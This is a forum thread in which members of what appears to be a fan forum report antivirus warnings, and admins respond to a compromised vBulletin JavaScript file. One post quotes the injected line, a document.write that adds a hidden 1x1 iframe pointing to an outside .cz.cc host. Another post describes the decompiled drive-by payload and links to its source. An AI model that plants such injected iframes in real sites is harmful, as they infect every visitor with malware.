Ehh, I don't see anything. I'll need more to go on.
Guys Be Careful!
-
-
Ehh, I don't see anything. I'll need more to go on.
Well it isn't blocked at work - maybe just an Avast issue - i'll take a look when I get home in 8hours or so and give you anything the notifications have on it.
-
Still no problems here.
-
found it
http://www.apforums.net/clientscript/yui/connection/connection-min.js?v=415
document.write("<iframesrc='http: xdfhsryjdtyksetjhsrg.cz.cc="" main.php?page="d50dc938030df4b7'" width="1" height="1" frameborder="0">")
–---
you know what... i think they have some sort of backdoor in server.</iframesrc='http:> -
Ehh, I don't see anything. I'll need more to go on.
Infection Details URL: http://forums.arlongpark.net/clientscript/yui/connection/connection-min.js?v Process: file://C:\Program Files (x86)\Mozilla Firefox\firefox.exe Infection: html:Iframe-inf Not sure if that helps - from Avast occurs on any forum thread. Tried to clean up the text but it wont let me.
-
This is what I got from NOD32 as I opened the forum (front page): http://apforums.net/clientscript/yui/connection/connection-min.js?v=415 Threat identified as: HTML/Iframe.B.Gen Virus Seems like this can happen on any page (even this), since I seem to get the warning every time I refresh this page!
-
It's weird. I can see the js file and it's actually pretty huge. But I don't see any iframe code in it anywhere. But I'll take your guys word for it and shut it down for now.
-
Well now if I post a link at the top of the page no matter what I do it stays bundled together with the rest of the text and I can't put any space between them, no matter what I do. Hell I can't even start a new paragraph, because even when I type it on another line it just deletes all the spaces and puts it right back, turning everything I post into an inteligeble wall of text.
-
It's weird. I can see the js file and it's actually pretty huge. But I don't see any iframe code in it anywhere.
Its not exactly iframe. Who ever injected made a typo.
-
@No:
Well now if I post a link at the top of the page no matter what I do it stays bundled together with the rest of the text and I can't put any space between them, no matter what I do. Hell I can't even start a new paragraph, because even when I type it on another line it just deletes all the spaces and puts it right back, turning everything I post into an inteligeble wall of text.
Yeah, I know. The js file has to be fixed first. At the moment it's simply set to not load since it's infected.
-
I don't know if my computer is just a piece of shit or what, but the multi-quote button isn't working for me. Figured I'd throw this here instead of making a new thread because it doesn't seem thread-worthy.
The regular quote button is working, though.
-
Things should be working now.
-
Ah, yes.
Thank you, Urouge.~
-
Lemme see.
Post .
Edit: Yeah it works. Thanks Urouge.
But while we're on the topic, I find that every time when someone posts a link and then starts typing the first letters after the link, even when you edit the URL tags, still get absorbed into the link. It still works but it is sort of annyoing. Any idea what causes that ?
-
Things should be working now.
It did when I checked it this morning at home thanks Urouge - I would probably go insane if I couldn't access this site from work :sad:
-
I've been getting virus threats on the forum.
So yeah, please look into it.
-
I got attacked again just now. Why does this keep happening?
-
Same. Getting blocked stuff.
-
Apparently it's back again, since my NIS is stopping an intrusion attempt by dfgjahkdjsfasfsdgafg.cz.cc on every page I goto on this site this morning.
-
Er… Sorry to give more trouble, but I've been having messages on my end too, and I've never had virus trouble with this site before. Microsoft Security Essentials keeps popping up, and the Adobe Acrobat plugin crashes at the same time (though I didn't click anything).
!
I've clicked Clean Computer multiple times, but the message keeps coming back.
Thanks :)
-
same file as before infected again
–- Update From New Post Merge ---
okay just finished de-compiling the virus code, this is what it does.
it detects your OS and browser and java version and java vendor and loads virus file accordingly (jar and .pdf files). and adobe crashes because it tries to inject another javascript via adobe. It tires to write a file to user's system according to his OS (which uploads and mails some data (what data - i dont know)).
Here are some of the decoded virus files (source codes). Maybe someone with more time and better skills can get more:
Worm.jar
Mailagent: http://pastebin.com/p7kBHCwV
VirtualTable: http://pastebin.com/NrypDDRX
Classid: http://pastebin.com/tF2MqwLq
Classtype: http://pastebin.com/sRQvRTAd
cid: http://pastebin.com/QU7KXdL0
–--
the code detecting java version and vendor: http://pastebin.com/FDgVqFp6
javascript deteing os etc and loading pdf files: http://pastebin.com/fLnCdq3w
pdf file with js: http://pastebin.com/GHV2cLv7@Urouge, Brennen and other admins: I know you guys work really hard and I am fully aware that maintaining a site such as apforums is no easy task. But considering how frequently the files are getting infected and how worms which mail and upload stuff ( can be anything from keylogger to spam mailers to … everything), don't you think there should be a permanent solution by now?
--- Update From New Post Merge ---
just noticed that javascript in status bar (left bottom corner). There should be nothing on apforums which might have caused that to show. Any ideas where was your mouse when you took that screenshot?
(i think that either that adobe crash or windows essential msg is fake).
-
same file as before infected again
–- Update From New Post Merge ---
okay just finished de-compiling the virus code, this is what it does.
it detects your OS and browser and java version and java vendor and loads virus file accordingly (jar and .pdf files). and adobe crashes because it tries to inject another javascript via adobe. It tires to write a file to user's system according to his OS (which uploads and mails some data (what data - i dont know)).
Here are some of the decoded virus files (source codes). Maybe someone with more time and better skills can get more:
Worm.jar
Mailagent: http://pastebin.com/p7kBHCwV
VirtualTable: http://pastebin.com/NrypDDRX
Classid: http://pastebin.com/tF2MqwLq
Classtype: http://pastebin.com/sRQvRTAd
cid: http://pastebin.com/QU7KXdL0
–--
the code detecting java version and vendor: http://pastebin.com/FDgVqFp6
javascript deteing os etc and loading pdf files: http://pastebin.com/fLnCdq3w
pdf file with js: http://pastebin.com/GHV2cLv7@Urouge, Brennen and other admins: I know you guys work really hard and I am fully aware that maintaining a site such as apforums is no easy task. But considering how frequently the files are getting infected and how worms which mail and upload stuff ( can be anything from keylogger to spam mailers to … everything), don't you think there should be a permanent solution by now?
--- Update From New Post Merge ---
just noticed that javascript in status bar (left bottom corner). There should be nothing on apforums which might have caused that to show. Any ideas where was your mouse when you took that screenshot?
(i think that either that adobe crash or windows essential msg is fake).
I'm getting nothing on my end.
Should I be worried in light of what you posted ?
-
@No:
I'm getting nothing on my end.
Should I be worried in light of what you posted ?
nothing on your end because browsers have started blocking the infected url in question.
About worried… i dont know. With worm this complex lot depends on your antivirus, flash and java versions. -
Yeah it's the Blackhole Exploit Kit. I got it too, now it seems to be gone. If you get infected, I think it will launch a fake virus scanner which tells u u have many virus infections and prompts you to buy it. You probably won't be able to do anything with your PC anymore (I had something similar happen to me a month or two ago, googled it on another PC, then manually removed it in safe mode).
Funny when I read up on the Blackhole Exploit Kit: "the kit will cost $1,500 annually, $1,000 for a half-year and $700 for 3 months. (..) Even though the price of this exploit kit is high, it remains a sought after commodity."
-
Yeah it's the Blackhole Exploit Kit. I got it too, now it seems to be gone. If you get infected, I think it will launch a fake virus scanner which tells u u have many virus infections and prompts you to buy it. You probably won't be able to do anything with your PC anymore (I had something similar happen to me a month or two ago, googled it on another PC, then manually removed it in safe mode).
Funny when I read up on the Blackhole Exploit Kit: "the kit will cost $1,500 annually, $1,000 for a half-year and $700 for 3 months. (..) Even though the price of this exploit kit is high, it remains a sought after commodity."
I looked this up and how anyone can sell it like that is a mystery to me.
-
I disconnected my Internet for a while. Came back on and got the Security Essentials thing as well as this which has never appeared anywhere before:
!
! @FF Hmm I'll see if I can remember what triggered that javascript thing at the bottom.–- Update From New Post Merge ---
just noticed that javascript in status bar (left bottom corner). There should be nothing on apforums which might have caused that to show. Any ideas where was your mouse when you took that screenshot?
(i think that either that adobe crash or windows essential msg is fake).
Mm I moused around but can't find it anymore. I think that most likely, it was when I moused over the notification at the top telling me Adobe Acrobat had crashed, see details, send crash report, etc. It's not appearing anymore though, and neither is the Essentials message. The message I just posted still pops up every time I come here, though.
-
I just got the same.
-
So long as AVG keeps kicking its ass, I don't have anything to worry about no wonder how many times it attacks me I assume.
-
@No:
I looked this up and how anyone can sell it like that is a mystery to me.
stuff like this sells for lot in underground forums. and $1000 per year is not high at all.
-
Yeah I'm getting "This site is a reported attack site" when visiting the main page at least. It seems to only be that page.
-
It's taken care of. Trust me every time it happens we're taking action that will either narrow it down or eliminate it. I'm not going to go into specifics but we know a lot more of what's happening now than we did two weeks ago.
-
good to know that
-
It's taken care of. Trust me every time it happens we're taking action that will either narrow it down or eliminate it. I'm not going to go into specifics but we know a lot more of what's happening now than we did two weeks ago.
Glad to read that, because it started with me, too, today and I was quite surprised by it.
-
Yeah every time I go to a new page on here I get the "this site may harm your computer" warnings
-
Yeah very time I go to a new page on here I het the "this site may harm your computer" warnings
You can ignore it now since its been fixed. But help getting it unlisted by clicking "this is not a harmful site". and you can browse using http://forums.arlongpark.net/
-
It's happening to me right now.
-
Same here + adobe player always crashed a while ago
-
It's taken care of. Trust me every time it happens we're taking action that will either narrow it down or eliminate it. I'm not going to go into specifics but we know a lot more of what's happening now than we did two weeks ago.
That's good then, I was a bit worried.
-
@Urouge, Brennen and other admins: I know you guys work really hard and I am fully aware that maintaining a site such as apforums is no easy task. But considering how frequently the files are getting infected and how worms which mail and upload stuff ( can be anything from keylogger to spam mailers to … everything), don't you think there should be a permanent solution by now?
The problem is more widespread than us. Other forums have the same exact issue, to which vBulletin released a patch that doesn't work. There have been more than just what has been reported as well, so like Urouge said, we are narrowing it down little by little. Once we know it won't be bothering us again, I'll get Google off our back.
-
Google warned me today.. I use linux so I just went straight through. Linux ftw!
Also, I thought the forum started getting ads and one of them was the cause of the infection, which is normally the case with most sites which this happens to. Good to see it isnt true.
Noscript + Adblockplus + Firefox + Linux = Mandatory Browsing kit.
-
Yeah, I got a warning from Google today. First time I ever got any kind of malware warning.
-
Just got it popping up saying "this site will nuke your pc, do you want to continue?"
My i7+massive security laughs at this idea.
-
I just got this site as a big red box saying this is a attack site..i had to tell the Firefox it wasnt..whats going on here?
-
Basically the admins have stole all your credit card details to fund the next Disneyland trip.
-
Same for me… Big red attack warning with firefox
-
Me too.
I was almost afraid to go back onto the site. -
I'm using Google Chrome, at the moment, and today I already got twice the red screen with the "Beware - Malware" alert, when trying to open this forum.
-
The issue is fixed, it's just google that doesn't know it yet.
-
Just went to AP news page and google chrome detected malware but avast didnt, anyone got this too?
-
Ok staying off the site until the situation is fixed..hopefully this site just didnt slow down my computer